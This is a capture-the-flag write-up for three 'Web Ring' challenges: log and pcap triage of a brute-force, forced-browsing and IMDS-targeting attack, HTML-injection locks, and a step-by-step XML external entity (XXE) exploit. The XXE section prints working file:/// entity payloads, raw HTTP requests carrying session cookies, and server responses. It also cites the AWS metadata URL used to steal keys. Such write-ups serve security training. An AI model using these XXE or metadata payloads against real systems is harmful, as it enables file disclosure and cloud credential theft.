Web Ring
Boria PCAP Mining
On this challenge we are provided multiple artifacts to answer multiple questions.
This zip file contains web error logs + a pcap file
First question - Most of the traffic to this site is nice, but one IP address is being naughty! Which is it?
We can use cat weberror.log | cut -d" " -f1,9 | grep -v -P [a-zA-Z] to obtain all IPs + http result code minus the entries that contain text. Below there is the breakdown of the command: - cat weberror.log - Contents of the weberror.log file - cut -d" " -f1,9 - show the 1st and 9th field only (IP + HTTP Status code) - grep -v -P [a-zA-Z] - Remove all entries that contain at least 1 letter
Now the only thing remaining is to do stacking of the results and for that we append to the previous command | sort |uniq -c| sort -n. This will sort the results count and then sort to show on the last line the IP and status code with more hits.
We can see 1 IP with a lot of 404 - Not Found
Second question - The first attack is a brute force login. What's the first username tried?
For this question the pcap will be super handy. We need to isolate the POST requests from the malicious IP. For that we can use the following display filter: ip.src == 18.222.86.32 and http.request.method == "POST"
Third question - The next attack is forced browsing where the naughty one is guessing URLs. What's the first successful URL path in this attack?
For this question we can use either of the files, however I found it easier to use wireshark. The idea is to first create a display filter where we see all responses from the server to the malicious IP, apply the HTTP status code as a column, identify the ongoing attack and then look for a 302 or 200 in the middle of the 404.
For the display filter we will be using: ip.dst == 18.222.86.32 and http.response
The forced browsing attack starts on the packet 23355. So now we just need to look for the first non 404 HTTP status code and we will get the answer we are after.
Forth question - The last step in this attack was to use XXE to get secret keys from the IMDS service. What URL did the attacker force the server to fetch?
For this question I find it easier leverage the weberror.log. So the IMDS stands for Instance Metadata Service. We also know that in order to interact with it assuming is an AWS instance the IP will be 169.254.169.254 and we will see requests http://169.254.169.254/latest/meta-data/ . Knowing this we just need to look for entries that match this and find a valid response with AWS Key ID, Secret Key and Token.
Open Boria Mine Door
This challenge took me some time to fully understand and I'm sure I have solved not the intended way but hey if it works it works let's take the wins as we can.
We need to inject html code/object in order to match the collours and connect the different pipes. Each one of the locks has a different protection applied that will make it harder and harder to inject the payloads.
After looking into the source code of it was possible to identify each lock and their protections.
https://blog.detectify.com/2019/07/11/content-security-policy-csp-explained-including-common-bypasses/ - Contains really good explanation (better than I would be able to do ) on how CSP works and how can be bypassed. For this case we can still use the same payload as before.
To answer the remaining challenges I moved from div objects to svg objects. My knowledge/capability with these object is nearly null so instead of rotating the object I just created more and more objects.
By now we could move forward to the next challenge but there was a bonus to get all doors. So we continue our journey.
Based on reading the source code I can't explain how this payload works, the only thing I know is that after many tries it worked... I know I should know why it works but I can't explain it
Like before I can't explain why this payload works
The answers for Lock 4 + 5 + 6 don't always work. While the writeup was being written noticed that.
Glamtariels Fountain
This challenge is hosted on https://glamtarielsfountain.com/ and to be able to solve is better to use a proxy like burp suite.
After playing a while with the app (moving the objects) to Glamtariel or to the fountain the objects changed and new characters appeared.
Looking in burp for the request of moving the santa to Glamtariel we can see the below:
On this request we can see that the santa is img2 and the drop location is setup by Who and in this case is princess. After moving more and more object we move to a different set objects. Also while moving these objects we are receiving hints that will be important to complete this challenge.
After moving again the objects we move to a 3rd set of objects however this time a new creatures appears
At the start I have ignored this event but noticed that this was the mark where we would be able to change the content type (TYPE hint) from application/json to application/xml
POST /dropped HTTP/2
Host: glamtarielsfountain.com
Cookie: MiniLembanh=5cd3e613-59f6-4bed-b872-0ecbddefc710.DSATr_F2wS9jdg7z6oJKEmcblT8; GCLB="6069430908e4bb82"
Content-Length: 52
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: application/json
Content-Type: application/json
X-Grinchum: Ijc0NzlmMzA1Nzg0OTdhODI4ZjIxMDU0Yzk3MzRlN2ZiYmZhN2IyMmMi.Y6RMXw.q2UciNmm9WCq5MtTamW93OUPXkQ
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.95 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://glamtarielsfountain.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://glamtarielsfountain.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
{"imgDrop":"img2","who":"princess","reqType":"json"}POST /dropped HTTP/2
Host: glamtarielsfountain.com
Cookie: MiniLembanh=5cd3e613-59f6-4bed-b872-0ecbddefc710.DSATr_F2wS9jdg7z6oJKEmcblT8; GCLB="6069430908e4bb82"
Content-Length: 131
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: application/json
Content-Type: application/xml
X-Grinchum: Ijc0NzlmMzA1Nzg0OTdhODI4ZjIxMDU0Yzk3MzRlN2ZiYmZhN2IyMmMi.Y6RMXw.q2UciNmm9WCq5MtTamW93OUPXkQ
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.95 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://glamtarielsfountain.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://glamtarielsfountain.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
<?xml version="1.0" encoding="UTF-8" ?>
<root>
<imgDrop>img2</imgDrop>
<who>princess</who>
<reqType>xml</reqType>
</root>
After solving the previous challenge (6 locks) we are given an hint that we need to exploit a XML external entity (XXE) injection. After many and many tries (and leveraging the hints) finally was able to discover what was the injectable field and what is the path.
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///app/static/images/ringlist.txt" > ]>
<root>
<imgDrop>&xxe;</imgDrop>
<who>princess</who>
<reqType>xml</reqType>
</root>HTTP/2 200 OK
Server: Werkzeug/2.2.2 Python/3.10.8
Date: Thu, 22 Dec 2022 12:40:34 GMT
Content-Type: application/json
Content-Length: 350
Set-Cookie: MiniLembanh=5cd3e613-59f6-4bed-b872-0ecbddefc710.DSATr_F2wS9jdg7z6oJKEmcblT8; Domain=glamtarielsfountain.com; Path=/
Via: 1.1 google
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
{
"appResp": "Ah, you found my ring list! Gold, red, blue - so many colors! Glad I don't keep any secrets in it any more! Please though, don't tell anyone about this.^She really does try to keep things safe. Best just to put it away. (click)",
"droppedOn": "none",
"visit": "static/images/pholder-morethantopsupersecret63842.png,262px,100px"
}
As part of the response we are provided with a local path. Visiting https://glamtarielsfountain.com/static/images/pholder-morethantopsupersecret63842.png we are provided with the below image
From this image we can see a folder name (x_phial_pholder_2022) and two file names (bluering.txt redring.txt) Let's then try to retrieve them and see what we get from them:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///app/static/images/x_phial_pholder_2022/bluering.txt" > ]>
<root>
<imgDrop>&xxe;</imgDrop>
<who>princess</who>
<reqType>xml</reqType>
</root>
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///app/static/images/x_phial_pholder_2022/redring.txt" > ]>
<root>
<imgDrop>&xxe;</imgDrop>
<who>princess</who>
<reqType>xml</reqType>
</root>{
"appResp": "I love these fancy blue rings! You can see we have two of them. Not magical or anything, just really pretty.^She definitely tries to convince everyone that the blue ones are her favorites. I'm not so sure though.",
"droppedOn": "none",
"visit": "none"
}
{
"appResp": "Hmmm, you still seem awfully interested in these rings. I can't blame you, they are pretty nice.^Oooooh, I can just tell she'd like to talk about them some more.",
"droppedOn": "none",
"visit": "none"
}Recalling that on the last set of objects there were 4 rings (2 red, 1 blue and 1 silver) the next step was to try also silverring.txt
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///app/static/images/x_phial_pholder_2022/silverring.txt" > ]>
<root>
<imgDrop>&xxe;</imgDrop>
<who>princess</who>
<reqType>xml</reqType>
</root>{
"appResp": "I'd so love to add that silver ring to my collection, but what's this? Someone has defiled my red ring! Click it out of the way please!.^Can't say that looks good. Someone has been up to no good. Probably that miserable Grinchum!",
"droppedOn": "none",
"visit": "static/images/x_phial_pholder_2022/redring-supersupersecret928164.png,267px,127px"
}Once again we receive on the response a local path for another image: https://glamtarielsfountain.com/static/images/x_phial_pholder_2022/redring-supersupersecret928164.png
This time we receive a red ring with an interesting inscription (goldring_to_be_deleted.txt). Time to try this new payload:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///app/static/images/x_phial_pholder_2022/goldring_to_be_deleted.txt" > ]>
<root>
<imgDrop>&xxe;</imgDrop>
<who>princess</who>
<reqType>xml</reqType>
</root>{
"appResp": "Hmmm, and I thought you wanted me to take a look at that pretty silver ring, but instead, you've made a pretty bold REQuest. That's ok, but even if I knew anything about such things, I'd only use a secret TYPE of tongue to discuss them.^She's definitely hiding something.",
"droppedOn": "none",
"visit": "none"
}On this response we receive a new hint REQ. After some time I realized that this hint meant that we needed to change the location of the XXE payload and point to the silver ring (img1)
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///app/static/images/x_phial_pholder_2022/goldring_to_be_deleted.txt" > ]>
<root>
<imgDrop>img1</imgDrop>
<who>princess</who>
<reqType>&xxe;</reqType>
</root>{
"appResp": "No, really I couldn't. Really? I can have the beautiful silver ring? I shouldn't, but if you insist, I accept! In return, behold, one of Kringle's golden rings! Grinchum dropped this one nearby. Makes one wonder how 'precious' it really was to him. Though I haven't touched it myself, I've been keeping it safe until someone trustworthy such as yourself came along. Congratulations!^Wow, I have never seen that before! She must really trust you!",
"droppedOn": "none",
"visit": "static/images/x_phial_pholder_2022/goldring-morethansupertopsecret76394734.png,200px,290px"
}Question - Stare into Glamtariel's fountain and see if you can find the ring! What is the filename of the ring she presents you?
Last updated